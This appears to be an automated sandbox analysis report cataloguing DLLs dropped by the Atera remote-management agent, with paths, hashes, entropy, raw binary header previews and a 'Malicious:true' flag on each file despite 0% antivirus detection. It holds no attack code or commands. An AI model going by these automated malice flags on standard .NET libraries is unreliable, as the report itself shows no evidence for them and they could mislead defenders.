                                                                                                                                                                                                                                                                                                                                  SHA-256:0A23E41C0054097A87F3DFB498C6F337EC75B84B2C177793301CAC27505DA094
                                                                                                                                                                                                                                                                                                                                  SHA-512:7022EF67084B39779DAD4BD30E78991B314B83AAFA2F204505C8A0197A1D5DE617D3D2AA9E495458BEEA5BA68A6B48B75C15413AA9BEFB6D1467C15D2DA35920
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....L..........." ..0.............Z.... ........... ..............................a.....`.....................................O.......................P(..............T............................................ ............... ..H............text...`.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................;.......H.......<5..,m..........h...0.............................................()...*:.().....}....*.~....*...0..........(....,..*..(.....o*......&...*...................0...........(.......(+...-..,..*.*.(....,.r...p......%...%...(,...*..(-...*.(....,.r...p......%...%...%...(,...*...(....*.(....,!r...p......%...%...%...%...(,...*....(/...*..,&(....,..r...pr...p.(,...(0...*..(1...*.*.(....,.r...p......%...%...(,...*...(2...*.(....,.r...p......%...%...%...(,...*....(3...*.(....,"r.

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\System.ServiceProcess.ServiceController.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):34896
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.286567257982752
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:768:U3wGplLcGsTK/lWNVz7MW+N92D1NlteVPEpYi60wW:U3wMZ1lWL7MW+N0peVo76/W
                                                                                                                                                                                                                                                                                                                                  MD5:831B477E111410FB32E4246A54ED8D1B
                                                                                                                                                                                                                                                                                                                                  SHA1:3FA0292E6809CB3E721AFCB181BC2669E5E15788
                                                                                                                                                                                                                                                                                                                                  SHA-256:114FE8C9E46C20C1C84FAEBF4275F5990D2166A07866602FE22189D37F9F2ECE
                                                                                                                                                                                                                                                                                                                                  SHA-512:73BABC599CF28879ECAFACBCFE5CF0A8637B1D198394724710FE6EF0B89BB369158F5223A1E329017352C92595FBF9F0B2FF379C438813CBAA30E32F201EF005
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....O............" ..0..T..........6r... ........... ....................................`..................................q..O....... ............`..P(...........p..T............................................ ............... ..H............text...<R... ...T.................. ..`.rsrc... ............V..............@..@.reloc...............^..............@..B.................r......H........(..h6..........$_..8...\p........................................(....*^.(.......7...%...}....*:.(......}....*:.(......}....*:.(......}....*:.(......}....*.~....*..0..........(....,..*..(.....o ......&...*...................0...........(.......(!...-..,..*.*.(....,.r...p......%...%...("...*..(#...*.(....,.r...p......%...%...%...("...*...($...*.(....,!r...p......%...%...%...%...("...*....(%...*..,&(....,..r...pr...p.("...(&...*..('...*.*.(....,.r...p......%...%...("..

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\System.Text.Encodings.Web.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):71248
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.130135778780401
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:1536:MQuedlunqpC9yYxC9P7tt08eeykGlsESo3G76A:X3KICHxC9ZJexRsG3G7
                                                                                                                                                                                                                                                                                                                                  MD5:24184DBE4F4941C53A9269530C4040CC
                                                                                                                                                                                                                                                                                                                                  SHA1:513647F8D92BD5C39AADA6221400024F4388C23F
                                                                                                                                                                                                                                                                                                                                  SHA-256:2A6E5FDB3506CCDD6A87D21ABB9FD2A781C5433CF92730789B7A1FE32E03F747
                                                                                                                                                                                                                                                                                                                                  SHA-512:A1658B986E3D7A1CB65DA45E8C1B62ADE017CAF09E329340A29A1DCF1E07767D118039540F44F68737EAB6B8807F242D1F49D3388F3DE99F48C826A1CDD25DE5
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....n..........."!..0.................. ........@.. .......................`.......(....`.....................................O.... ..................P(...@..........T............................................ ............... ..H............text...$.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H............w...........d................................................(....*^.(...........%...}....*:.(......}....*:.(......}....*^.(...........%...}....*:.(......}....*....0..E........ ...._.b..._X ....Y..e pp.._.d.X ....X.`.....X(......R...(......d.R*....0..K........ ...._.b..._X ....Y..e pp.._.d.X ....X.`.....X(..... ...._.S...(......d.S*f..._....0X....91...X....*.~....*.0..........(....,..*..(.....o.......&...*..................~~....%-.&.....(....s....%.....*.r...p(.

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\System.Text.Json.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):543312
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.986962252482626
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:6144:W6+HbUMHVgQO61+5ZpvsQ60OghEusa4UQgce0x7KjF76pkLzLFEnJEIfibgPKiU4:W6aRgsgfEU4UDcxkLzJEBsgPKiUYFHPZ
                                                                                                                                                                                                                                                                                                                                  MD5:113ABC811B9384F3DA77D938C2267CA2
                                                                                                                                                                                                                                                                                                                                  SHA1:8EEFC8B384C313177329CE763C649C00064F0CD4
                                                                                                                                                                                                                                                                                                                                  SHA-256:58552086C5A06A2DCC1C4D9D29FF74860839FAC029B763DFF924E16CBCDF1324
                                                                                                                                                                                                                                                                                                                                  SHA-512:E61ADAC5650E88F532757405C942B7485B8131004295A74356989509F7DBE588F7212955F629136791D00F1229CCBC7C29401D4930A162A3722E95354C61C8FA
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...B............."!..0..............3... ........@.. ....................................`.................................h3..S....@..............."..P(...`.......2..T............................................ ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`....... ..............@..B.................3......H...........s...........C...w..H.........................................(....*^.(...........%...}....*:.(......}....*:.(......}....*:.(......}....*:.(......}....*.0..&........(.......(..../.(........(....G* ....*...0..@.......(.....3'..0Yn.!.~...~...i.?_b...@jY..._.j2..*.*.(.... .........*B..... ....s....*.~....*.0..........(....,..*..(.....o.......&...*...................(....,.r...p......%...%...(....*..(....*.(....,.r...p......%...%...%...(....*...(....*.(....,!r...p....

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\de\Microsoft.Win32.TaskScheduler.resources.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):9728
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.560006548424685
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:AiWWNv/jzSENtqcadVl8PandjJUf7ZJSqSi/ufPU1S5rxg0XWr:v1Nvb5adVl8P2djJMZJSGu3z5rxg0XWr
                                                                                                                                                                                                                                                                                                                                  MD5:63E9B310597AC25A1CEAA55B6F0CC9F3
                                                                                                                                                                                                                                                                                                                                  SHA1:0C5B170ABA511F479E593727CF7F562523EA7E8C
                                                                                                                                                                                                                                                                                                                                  SHA-256:96B51BB87A1F4072D10B774FFADF81AF93881900571D21FE638E10E3FB0220B8
                                                                                                                                                                                                                                                                                                                                  SHA-512:3BAF3836F8F42DF2D3444409115A3564B0961CD3141CC46E248E6E29A59EC773E511477D8DED4BE05125F2F45E987FD6F94AC5676C318A728B7CA63EB78E9056
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....b...........!.................9... ...@....... ..............................;.....@..................................9..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`.......$..............@..B.................9......H........4............... ......P ........................................H.W..Q.2.<.L......H.*...W.!".5....8...}P1......#....Z.N..d.....o...P.....@G...g.g..7.w.!V_..4..7.=.G.".8%..q..G....a...............lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet....G.......PADPADP..7...7....\.....`.Q......!...........:oH..S....c...........L.}..>.. 2...3...5......:...

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\es\Microsoft.Win32.TaskScheduler.resources.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):10240
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.43329064965383
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:ycWWNv/jzSEStoC1vxx6hUltfxx+BE00cUnAPq115rxg0XWr:yc1NvbGVxx6hUltfxgE00cLq5rxg0XWr
                                                                                                                                                                                                                                                                                                                                  MD5:94136496103CA7B4425EB6D639EEC501
                                                                                                                                                                                                                                                                                                                                  SHA1:AC8F3F4E7C04D4BEEFBA94004A114880662C8387
                                                                                                                                                                                                                                                                                                                                  SHA-256:A3A44472A3944FF0D5C31241BF6DD9B6AE04EAE03581D338B53E3E41EED7141D
                                                                                                                                                                                                                                                                                                                                  SHA-512:04F4614C5BCF97EC643079D50FFA800B2F89A503E02D7DA6FF97AA463993A6964833068063C5A144C7E7D44BEAF082B43EA672F66B4E831EC2CE828666C4965B
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....b...........!................n:... ...@....... ...............................x....@................................. :..K....@.......................`....................................................... ............... ..H............text...t.... ...................... ..`.rsrc........@......................@..@.reloc.......`.......&..............@..B................P:......H.......,5............... ..\...P ........................................^M...=..A'R..\N.....U.{..-.Y+........E.?.......3.....#..9.v..2q..?..L..>s.SI.....}...M..Q.=.w....(<.I...,....>^..E..J..X..............lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet....G.......PADPADP..7...7....\.....`.Q......!...........:oH..S....c...........L.}..>.. 2...3...5......:...

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\fr\Microsoft.Win32.TaskScheduler.resources.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):10240
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.581775279455886
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:R/WWNv/jzSEYtPpmKJiDjgmlRFI0HYZDKz/VPH1g5rxg0XWr:R/1NvbdKJiDjgmlRi0HYZDMa5rxg0XWr
                                                                                                                                                                                                                                                                                                                                  MD5:8C7822BE67F1576F2E11817826ABE40E
                                                                                                                                                                                                                                                                                                                                  SHA1:9B9EDD5FEE4415CB7FB09F0940BEAAFF1C107EB7
                                                                                                                                                                                                                                                                                                                                  SHA-256:C9A7CFE32AB4567D671A84397ABDA29CC92B21CB412CE0F0DF12352C68B7460F
                                                                                                                                                                                                                                                                                                                                  SHA-512:70F76DFFB3FE25F1D3550BEC3C168805AB422C6A0505DDDD21EB2A5B59F24D5F37AEDE0DBEBCF16F821868789E17A87AE61442BE6525ECA0461C0146E4E6B850
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....b...........!................^;... ...@....... ....................................@..................................;..W....@.......................`....................................................... ............... ..H............text...d.... ...................... ..`.rsrc........@......................@..@.reloc.......`.......&..............@..B................@;......H........6............... ..?...P ......................................S...8cY)..6. .X.YE...W.....*.......r.~@.]\.D.3.....4I...P.u.....Y2Y.n....)@.xV.#g..V.tI.&.gy8....)U..@k..n...FF..w..6.) R.;..............lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet....G.......PADPADP..7...7....\.....`.Q......!...........:oH..S....c...........L.}..>.. 2...3...5......:...

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\it\Microsoft.Win32.TaskScheduler.resources.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):10240
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.368843686720491
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:IiWWNv/jzSE5tyT1TNgr1nJIhZAf/07mPk1q5rxg0XWr:31NvbGTNgr1nJI3+07M75rxg0XWr
                                                                                                                                                                                                                                                                                                                                  MD5:79C01911FD90F929CCBD1D4964D2C17A
                                                                                                                                                                                                                                                                                                                                  SHA1:1878855F9C350B245C3258204A754770CAD776A3
                                                                                                                                                                                                                                                                                                                                  SHA-256:E8F0F7F9E9F2D836AAA341A39D3B395B397BAC0B88F6DDED3F159A6C8D2D74A1
                                                                                                                                                                                                                                                                                                                                  SHA-512:0C820224F516FE888621C09E3ED1870AC4B702AB97B1CE3CE4463445FC96F9D8798C97B6AE6ECFF1175D8D8EE8657052AF0E42D03B55340635CF9F5E65A9D6FA
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....b...........!.................9... ...@....... ....................................@..................................9..W....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`.......&..............@..B.................9......H........4............... ......P ........................................^V..d.~.R.t..i....v=.pIE\..#.}-{.u4....fIk.9.A..G....P_.S.u...w...J.AY....,.v.. ...A..."./..%.z+...".e..:.d....t.G...o................lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet....G.......PADPADP..7...7....\.....`.Q......!...........:oH..S....c...........L.}..>.. 2...3...5......:...

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\pl\Microsoft.Win32.TaskScheduler.resources.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):10240
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.593201257102684
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:9SWWNv/jzSEYtq2dE1cxy8ON0Qsk96sPE1V5rxg0XWr:9S1NvbaG1cxy8ONHskd85rxg0XWr
                                                                                                                                                                                                                                                                                                                                  MD5:437252DA54AB3171BC7DE366E5494AD8
                                                                                                                                                                                                                                                                                                                                  SHA1:A4FCFD9240B28C836240D4CAA4C9EC8DE38F6E9F
                                                                                                                                                                                                                                                                                                                                  SHA-256:9BFB9826E286B55AA5A580A5C220114063871B1EA8C541DF783A73EF8E72806B
                                                                                                                                                                                                                                                                                                                                  SHA-512:8D56A2EF0DE3B3BF16FE4D931EE6D6A8119E4CD7B3FFA52AC3EF65CEA2A2F4C4E99ED536757546A54CD5A2318A1BA4E70E6425367402CFD06345FEA6EE8442C0
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....b...........!.................;... ...@....... ..............................._....@..................................:..K....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`.......&..............@..B.................:......H........5............... ......P .......................................4....4...L.."...J...%-..............Drc....4.....n.3Cw .r$y.4......%..5[YupFe....R..!`..#h.I..-3..kH..:~ya..P9....PD.}...............lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet....G.......PADPADP..7...7....\.....`.Q......!...........:oH..S....c...........L.}..>.. 2...3...5......:...

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\ru\Microsoft.Win32.TaskScheduler.resources.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):10752
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.84740063117937
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:AHwWWNv/jzSEfthb7O9JKggIOrCPPzm394in3fwB/CZPlN1O5rxg0XWr:AQ1NvbH7O9JKgglrCPChnYVC5E5rxg06
                                                                                                                                                                                                                                                                                                                                  MD5:44CC811E193FB220954A0E56AF6F7682
                                                                                                                                                                                                                                                                                                                                  SHA1:B1437F518F3D8E8DEAD506D7E352B69593486244
                                                                                                                                                                                                                                                                                                                                  SHA-256:8CDCF449550DF3F9CACD3A8A41D19D6144BB0FED630825D6118D4077F637BC35
                                                                                                                                                                                                                                                                                                                                  SHA-512:E3FE956494F6179D6A725ECA38FE0E0739A14300DE035093212B0169BED45374E3792EBF7DF916996923777CCB9842C04D9B954D30094D51CE81A892D8F49385
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....b...........!................~=... ...@....... ....................................@.................................,=..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@....... ..............@..@.reloc.......`.......(..............@..B................`=......H.......88............... ..e...P .......................................s....E..s....D6..|G....Kc....,..M......8..................}..\.bf..qe.T....w RF..B..y5fW=...N&GE(..[...._.H.....Y.c...ta..............lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet....G.......PADPADP..7...7....\.....`.Q......!...........:oH..S....c...........L.}..>.. 2...3...5......:...

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\runtimes\browser\lib\net6.0\System.Text.Encodings.Web.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):71312
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.106692533939604
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:1536:mxuAEP6SHdOP71+KXUk/lsQDzZfOmLeSo0df9Xzlu:eEP6SHdOItSlXfNeSdf9Xxu
                                                                                                                                                                                                                                                                                                                                  MD5:0631D48880E7DDDDE2733C133BA486BB
                                                                                                                                                                                                                                                                                                                                  SHA1:08BDC5C585123FA5F3B4D670DC92CBAA7620725A
                                                                                                                                                                                                                                                                                                                                  SHA-256:AAD8B9A018FC4C4601EDC7C9169370EEE26628C4D90F967C947BA9A81EC4B224
                                                                                                                                                                                                                                                                                                                                  SHA-512:3AD9C20EF888DBD78AD99673E2242ED45006F204FE704076C7791A681849E4A5DDFA9E38862F26DB8203262536E92F1757FDB6982A9FDE1625C3825D89F08A41
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....T............"!..0.................. ........@.. .......................`......B.....`.................................x...S.... ...................(...@......x...T............................................ ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H.......,...Lx..........$d................................................(....*^.(...........%...}....*:.(......}....*:.(......}....*^.(...........%...}....*:.(......}....*....0..E........ ...._.b..._X ....Y..e pp.._.d.X ....X.`.....X(......R...(......d.R*....0..K........ ...._.b..._X ....Y..e pp.._.d.X ....X.`.....X(..... ...._.S...(......d.S*f..._....0X....91...X....*.~....*.0..........(....,..*..(.....o.......&...*..................~~....%-.&.....(....s....%.....*.r...p(.

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\runtimes\win\lib\net6.0\System.Diagnostics.EventLog.Messages.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):801048
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):1.7800450887072108
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:8qirVlWQX3WT56Os1HnhWgN7acWf53p13s5yX01k9z3Agrf8mNVf0nj:8BriQ+5kHRN76HcYR9zPrf8mrf0nj
                                                                                                                                                                                                                                                                                                                                  MD5:7A44C33341844DBE9C6FA526AF88E80A
                                                                                                                                                                                                                                                                                                                                  SHA1:0ACABD100F61A2F8B3C5E68A270599AD54EB8A39
                                                                                                                                                                                                                                                                                                                                  SHA-256:68F73AB17FB7F4AFF3D35EF6DB0E9D5B0FA0151111CB3D03992E23BC29D6C40A
                                                                                                                                                                                                                                                                                                                                  SHA-512:B81D63B345C193C6DEF17372311447D305AE167B2C4D1C2FDB0344D1E1EF5FF4F9D52599FFD862B2480825B308178737DF7E5E48C31E712339F009E92B6EAF57
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...|'............" ..0.............&)... ...@....... ....................................`..................................(..O....@..l................)...`.......'..T............................................ ............... ..H............text...,.... ...................... ..`.rsrc...l....@......................@..@.reloc.......`......................@..B.................)......H.......P ......................H'......................................BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID.......`...#Blob......................3..............................................-.....-...0.....M.................R.................h.....7...........[.....x...........D...................................).....1.....9.....I... .Q.....Y.....a.....i.....q.....y...............................#.....#.....+.....3.X...

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\runtimes\win\lib\net6.0\System.Diagnostics.EventLog.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):159904
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.097873216527841
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3072:eXCCOOz54xuTlmyRmIazZ11Ip5ZUWISFogVJoQyaH5MbDiz:Wz5dQ/cpJISF5c8abC
                                                                                                                                                                                                                                                                                                                                  MD5:950CD24EA3A9EFE5CCE594A8B228AFDA
                                                                                                                                                                                                                                                                                                                                  SHA1:4609AC99EBD157E4C9BF7E276EEA961C4BB3AA4F
                                                                                                                                                                                                                                                                                                                                  SHA-256:2AF781190AB7C97D6B846D5027745D609AD227665695E8ECB3AFD4CC9FCE6537
